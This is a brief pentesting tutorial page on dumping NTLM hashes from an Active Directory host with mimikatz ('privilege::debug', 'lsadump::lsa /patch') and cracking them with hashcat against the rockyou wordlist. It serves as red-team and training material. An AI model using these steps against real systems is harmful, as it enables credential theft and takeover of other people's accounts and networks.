search

Dumping Hashes with mimikatz

hashtag
Introduction

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network

We'll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat

hashtag
Dump Hashes w/ mimikatz

  1. cd Downloads && mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binary

  2. privilege::debug ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly

  3. lsadump::lsa /patch Dump those hashes!

hashtag
Crack those hashes w/ hashcat

  1. hashcat -m 1000 <hash> rockyou.txt

PreviousEnumeration with Bloodhound (GUI)NextGolden Ticket Attacks with mimikatz

Last updated